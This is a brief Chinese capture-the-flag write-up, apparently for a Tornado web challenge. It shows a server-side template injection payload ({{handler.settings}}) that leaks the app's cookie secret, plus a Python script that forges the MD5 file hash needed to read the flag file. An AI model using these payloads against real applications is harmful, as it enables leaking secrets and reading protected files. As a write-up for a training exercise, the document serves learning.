打开看到有三个文件:
三个文件内容如下:
通过 url 知道,访问一个文件需要知道:filename 跟 filehash
企图直接访问是不行的,想到了 burp 抓包,但是抓了半天没抓到,看了网上的 wp 是 模版注入
tornado 是一个 python 的模板,welcome.txt 中的 render 是 python 中的一个渲染函数,
报错时候的 url 是这样的
尝试把后面换成:{{111}},输出了!
在 tornado 模板中,存在一些可以访问的快速对象,例如:
<title> {{ escape(handler.settings["cookie"]) }} </title>
那么输入:{{handler.settings}}
拿到 cookie 就 OK 了!
import hashlib def md5value(s): md5 = hashlib.md5() md5.update(s) return md5.hexdigest() def jiami(): filename = '/fllllllllllllag' cookie_s ="ea7d75de-4ca5-486a-a69c-e690f3a8c217" print(md5value(filename.encode('utf-8'))) x=md5value(filename.encode('utf-8')) y=cookie_s+xprint(md5value(y.encode('utf-8'))) jiami()
